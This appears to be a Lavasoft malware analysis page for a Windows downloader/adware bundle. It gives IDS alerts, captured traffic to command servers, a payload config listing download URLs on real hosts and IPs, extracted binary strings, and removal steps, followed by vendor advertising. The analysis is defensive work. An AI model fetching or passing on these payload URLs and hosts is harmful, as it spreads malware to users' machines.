IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY HTTP Request on Unusual Port Possibly Hostile
GPL SHELLCODE x86 NOOP

Traffic

GET /tongji.php?k=803cd96c0f74b9b3be5d61ee009ac9673b26d0ff0a4142acff7f40d8c5529bf151cc9b398f4910825321ddaf9ec9b80c3beaa32eed80a712eeb06f6b021af12ea3b9765c2819b1affd09c5cf3c47bed4 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: WINNET
Host: srftj.xmzs8.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Sun, 11 Jan 2015 14:27:47 GMT
Content-Type: text/html;charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.17p1
2..ok..0..HTTP/1.1 200 OK..Server: nginx/1.0.15..Date: Sun, 11 Jan 201
5 14:27:47 GMT..Content-Type: text/html;charset=utf-8..Transfer-Encodi
ng: chunked..Connection: keep-alive..Vary: Accept-Encoding..X-Powered-
By: PHP/5.2.17p1..2..ok..0..



GET /db/apps.txt HTTP/1.0
Host: VVV.google.uscter.hk.moyan.cc
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*


HTTP/1.1 200 OK
Content-Length: 1457
Content-Type: text/plain
Last-Modified: Fri, 09 Jan 2015 13:26:20 GMT
Accept-Ranges: bytes
ETag: "0a6c1daf2cd01:fe4"
Server: IIS
X-Powered-By: WAF/2.0
Date: Sun, 11 Jan 2015 14:27:18 GMT
Connection: close
/*Setting*/..[ff1]..aa=OneDay..bb=OneDay.exe..cc=hXXp://124.232.152.11
9:18168/db/OneDay.zip..dd=..[ff2]..aa=lnk..bb=CreateShortcut.exe..cc=h
ttp://124.232.152.119:18168/db/CreateShortcut.zip..dd=..[ff3]..aa=....
..bb=ksimekusu_zhim_007.exe..cc=hXXp://124.232.152.119:18168/db/ksimek
usu_zhim_007.zip..dd=..[ff5000]..aa=uc..bb=Browser_V4.0.3214.0_r_4067_
(Build14122211)_1420477202.exe..cc=hXXp://ly.jyfb.net/air/aicc/check.p
hp?id=259..dd=..[ff11]..aa=mp..bb=-2203_1_mp.exe..cc=hXXp://124.232.15
2.119:18168/db/-2203_1_mp.zip..dd=..[ff12]..aa=tqrl..bb=tqrl_93_2508.e
xe..cc=hXXp://124.232.152.119:18168/db/tqrl_93_2508.zip..dd=..[ff13]..
aa=......bb=weather_b_90045.exe..cc=hXXp://124.232.152.119:18168/db/we
ather_b_90045.zip..dd=..[ff14][email protected].
.cc=hXXp://124.232.152.119:18168/db/IQIYIsetup_qHTTP/1.1 200 OK..Conte
nt-Length: 1457..Content-Type: text/plain..Last-Modified: Fri, 09 Jan 
2015 13:26:20 GMT..Accept-Ranges: bytes..ETag: "0a6c1daf2cd01:fe4"..Se
rver: IIS..X-Powered-By: WAF/2.0..Date: Sun, 11 Jan 2015 14:27:18 GMT.
.Connection: close../*Setting*/..[ff1]..aa=OneDay..bb=OneDay.exe..cc=h
ttp://124.232.152.119:18168/db/OneDay.zip..dd=..[ff2]..aa=lnk..bb=Crea
teShortcut.exe..cc=hXXp://124.232.152.119:18168/db/CreateShortcut.zip.
.dd=..[ff3]..aa=......bb=ksimekusu_zhim_007.exe..cc=hXXp://124.232.152
.119:18168/db/ksimekusu_zhim_007.zip..dd=..[ff5000]..aa=uc..bb=Browser
_V4.0.3214.0_r_4067_(Build14122211)_1420477202.exe..cc=hXXp://ly.jyfb.
net/air/aicc/check.php?id=259..dd=..[ff11]..aa=mp..bb=-2203_1_mp.e
<<< skipped >>>

The Malware connects to the servers at the folowing location(s):

%original file name%.exe_772:

.text
`.rdata
@.data
.ndata
.rsrc
uDSSh
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
unpacking data: %d%%
... %d%%
hXXp://nsis.sf.net/NSIS_Error
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|<>/":
\LOCALS~1\Temp\nst3.tmp\NSISdl.dll
zhim_007.exe"
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nst3.tmp\NSISdl.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nst3.tmp
_mp.zip
07.zip
WS2_32.dll
NSISdl.dll
invalid URL
Host: %s
GET %s HTTP/1.0
User-Agent: NSISDL/1.2 (Mozilla)
http=
Software\Microsoft\Windows\CurrentVersion\Internet Settings
Unable to open %s
%skB (%d%%) of %skB at %u.ukB/s
(%u hours remaining)
(%u minutes remaining)
(%u seconds remaining)
Downloading %s
<assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity>
KERNEL32.DLL
comdlg32.dll
OLEAUT32.dll
oledlg.dll
SHLWAPI.dll
WININET.dll
WINSPOOL.DRV
RegEnumKeyW
.reloc
>~..hv
To%s1
('.Lu*s
%f<`(
apps.txt
_007.exe"
2014.11.15.134232
:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nst3.tmp
c:\%original file name%.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nst3.tmp\uscter
%original file name%.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nso1.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
-2203_1_mp.exe
007.exe
hXXp://124.232.152.119:18168/db/-2203_1_mp.zip
007.zip
SR3#_`=*kiB.upG2
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46</description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="X86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency></assembly>
FFR.D9DD.CN
2.0.0.1
FreeFastRecovery.exe

KS1426.exe_2000:

.text
`.rdata
@.data
.rsrc
@.reloc
E:\Calendar2.0.2.0\kssrf\code\build\x86\ksinput.pdb
SHLWAPI.dll
ShellExecuteW
SHELL32.dll
KERNEL32.dll
USER32.dll
RegOpenKeyExW
RegCloseKey
RegOpenKeyW
RegCreateKeyW
ADVAPI32.dll
ole32.dll
OLEAUT32.dll
DeleteUrlCacheEntryW
WININET.dll
URLDownloadToFileW
urlmon.dll
MSVCP100.dll
sqlite3_open
sqlite3_close
sqlite3_get_table
sqlite3_free
sqlite3_free_table
sqlite3_exec
sqlite3.dll
Library.dll
?OnKeyDown@WindowImplBase@DUILIB@@UAEJIIJAAH@Z
?GetMessageMap@WindowImplBase@DUILIB@@MBEPBUDUI_MSGMAP@2@XZ
DirectUI.dll
MSVCR100.dll
_amsg_exit
_wcmdln
_crt_debugger_hook
GetProcessHeap
.?AVTable@SQLite@@
.?AVUTF8MBSTR@SQLite@@
.?AVDatabase@SQLite@@
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
0#0*00060
; ;$;(;,;0;4;8;<;
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\
%USER%
ksinput.exe
config %d
config.exe
3.0.3.9*%s*%s*%s*0*1*0*0*0
3.0.3.9*%s*%s*%s*0*0*1*0*0
php.ijgnot/moc.8szmx.jtfrs//:ptth
%s?k=%s
select * from plugin where item=%d
n\plugin\plugin.db
CREATE TABLE "plugin" ("item" INTEGER PRIMARY KEY, "vers" INTEGER, "name" VARCHAR, "path" VARCHAR, "file" VARCHAR, "down" VARCHAR)
%s%s%d.zip
update plugin set ver=%d, name='%s', path='%s', file='%s' down='%s' where item=%d
insert into plugin(item,vers,name,path,file,down) values(%d,%d,'%s','%s','%s','%s')
update plugin set vers=%d, name='%s', path='%s', file='%s', down='%s' where item=%d
php.gifnoc/moc.8szmx.afuruhs//:ptth
%s?v=3.0.3.9&t=1&x=%s&c=%d
20150111
3.0.3.9


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    install.exe:432
    CreateShortcut.exe:1284
    %original file name%.exe:772
    KS1426.exe:2000
    ksimekusu_zhim_007.exe:1896
    OneDay.exe:604

  2. Delete the original Malware file.
  3. Delete or disinfect the following files created/modified by the Malware:

    %Program Files%\Favorite\ico\ay.ico (784 bytes)
    %Documents and Settings%\%current user%\Desktop\Ó°ÊÓ´óÈ«.lnk (1 bytes)
    %Program Files%\Favorite\ico\123.ico (3 bytes)
    %Program Files%\Favorite\ico\360.ico (784 bytes)
    %Documents and Settings%\%current user%\Desktop\Ëѹ·ÍøÖ·µ¼º½.lnk (1 bytes)
    %Program Files%\Favorite\ico\tb1.ico (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsb5.tmp (13218 bytes)
    %Documents and Settings%\%current user%\Desktop\hao123ÍøÖ·µ¼º½.lnk (1 bytes)
    %Program Files%\Favorite\ico\sg1.ico (9 bytes)
    %Documents and Settings%\%current user%\Desktop\Internet Explroer.lnk (1 bytes)
    %Documents and Settings%\%current user%\Desktop\360ÍøÖ·µ¼º½.lnk (1 bytes)
    %Documents and Settings%\%current user%\Desktop\°®ÌÔ±¦.lnk (1 bytes)
    %Program Files%\Favorite\ico\movie.ico (12536 bytes)
    %Program Files%\Favorite\ico\ie.ico (784 bytes)
    %Program Files%\Favorite\ico\23451.ico (9 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nst3.tmp\-2203_1_mp.exe (269650 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nst3.tmp\CreateShortcut.exe (9276 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nst3.tmp\ksimekusu_zhim_007.exe (230865 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nst3.tmp\Furt.exe (16944 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nst3.tmp\apps.txt (1457 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp (20725 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nst3.tmp\OneDay.exe (108876 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nst3.tmp\NSISdl.dll (14 bytes)
    %Program Files%\KS2015011116\V1426\msvcr100.dll (25824 bytes)
    %Documents and Settings%\All Users\Application Data\kusuInput\ini\ÖÐÎÄÖ®ÐÇË«Æ´.ini (526 bytes)
    %Documents and Settings%\All Users\Application Data\kusuInput\wordlib\sys.wlb (39329 bytes)
    %Program Files%\KS2015011116\V1426\imeunit.exe (4992 bytes)
    %Documents and Settings%\All Users\Application Data\kusuInput\theme\ĬÈÏÖ÷Ìâ\bg_main.png (4 bytes)
    %Documents and Settings%\All Users\Application Data\kusuInput\theme\ĬÈÏÖ÷Ìâ\bg_status.png (4 bytes)
    %Documents and Settings%\All Users\Application Data\kusuInput\ini\Ìáʾ.ini (960 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\¿ìËÙÆ´ÒôÊäÈë·¨\ÉèÖÃ.lnk (812 bytes)
    %Program Files%\KS2015011116\V1426\atl100.dll (5064 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsy9.tmp\nsis.dll (3616 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsi8.tmp (285959 bytes)
    %Documents and Settings%\All Users\Application Data\kusuInput\zi\hzjf.dat (784 bytes)
    %Program Files%\KS2015011116\V1426\install.exe (1856 bytes)
    %Documents and Settings%\All Users\Application Data\kusuInput\ini\À¶ÌìË«Æ´.ini (912 bytes)
    %Documents and Settings%\%current user%\Application Data\kusuInput\phrase\ÎҵĶÌÓï.ini (24 bytes)
    %Program Files%\KS2015011116\V1426\imeword.exe (4992 bytes)
    %Documents and Settings%\All Users\Application Data\kusuInput\ini\Æ´Òô¼Ó¼ÓË«Æ´.ini (538 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsy9.tmp\KillProcDLL.dll (4 bytes)
    %Documents and Settings%\All Users\Application Data\kusuInput\theme\ĬÈÏÖ÷Ìâ\theme.ini (2 bytes)
    %Program Files%\KS2015011116\V1426\msvcp100.dll (14184 bytes)
    %Program Files%\KS2015011116\V1426\uninst.exe (838 bytes)
    %Documents and Settings%\All Users\Application Data\kusuInput\plugin\ImeSkin.dll (1552 bytes)
    %Documents and Settings%\All Users\Application Data\kusuInput\theme\ĬÈÏÖ÷Ìâ\buttons.png (5 bytes)
    %Program Files%\KS2015011116\V1426\DirectUI.dll (22192 bytes)
    %Program Files%\KS2015011116\V1426\Library.dll (5064 bytes)
    %Program Files%\KS2015011116\V1426\sqlite3.dll (22192 bytes)
    %Documents and Settings%\All Users\Application Data\kusuInput\ini\ÖÐÎÄ·ûºÅ.ini (560 bytes)
    %Documents and Settings%\All Users\Application Data\kusuInput\ini\¹Ì¶¥×Ö.ini (6 bytes)
    %Documents and Settings%\All Users\Application Data\kusuInput\ini\Ë«Æ´.ini (1 bytes)
    %Documents and Settings%\All Users\Application Data\kusuInput\plugin\ImeTool.dll (2392 bytes)
    %Documents and Settings%\All Users\Application Data\kusuInput\zi\j2f.dat (11048 bytes)
    %Documents and Settings%\All Users\Application Data\kusuInput\ini\ÖÇÄÜABCË«Æ´.ini (686 bytes)
    %Program Files%\KS2015011116\V1426\imetool.exe (6360 bytes)
    %Documents and Settings%\All Users\Application Data\kusuInput\plugin\plugin.db (2 bytes)
    %Documents and Settings%\All Users\Application Data\kusuInput\plugin\ImeMini.dll (5064 bytes)
    %Documents and Settings%\All Users\Application Data\kusuInput\ini\DOSË«Æ´.ini (674 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\¿ìËÙÆ´ÒôÊäÈë·¨\ÐÞ¸´.lnk (825 bytes)
    %Program Files%\KS2015011116\V1426\config.exe (11344 bytes)
    %Documents and Settings%\All Users\Application Data\kusuInput\theme\menu_buttons.bmp (920 bytes)
    %Documents and Settings%\%current user%\Application Data\kusuInput\wordlib\user.wlb (3 bytes)
    %Program Files%\KS2015011116\V1426\KS1426.exe (7192 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsy9.tmp\System.dll (11 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\¿ìËÙÆ´ÒôÊäÈë·¨\жÔØ.lnk (613 bytes)
    %System%\ksime.ime (126018 bytes)
    %Documents and Settings%\All Users\Application Data\kusuInput\ini\΢ÈíË«Æ´.ini (682 bytes)
    %Documents and Settings%\All Users\Application Data\kusuInput\phrase\ϵͳ¶ÌÓï¿â.ini (784 bytes)
    %Documents and Settings%\All Users\Application Data\kusuInput\ini\×ÔÈ»ÂëË«Æ´.ini (580 bytes)
    %Documents and Settings%\All Users\Application Data\kusuInput\zi\hzpy.dat (18424 bytes)
    %Program Files%\KS2015011116\V1426\nsis.dll (3616 bytes)
    %Documents and Settings%\All Users\Application Data\kusuInput\plugin\ImeWord.dll (1552 bytes)
    %Documents and Settings%\All Users\Application Data\kusuInput\theme\ĬÈÏÖ÷Ìâ\line.png (143 bytes)
    %Documents and Settings%\All Users\Application Data\kusuInput\plugin\ImeUnit.dll (2392 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\FNHI9HC7\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1G36EQJN\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\20DNL7ZC\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\VBTRRG9A\desktop.ini (67 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "KS1426.exe" = "%Program Files%\KS2015011116\V1426\KS1426.exe"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "KS1426.exe" = "%Program Files%\KS2015011116\V1426\KS1426.exe"

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2026 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now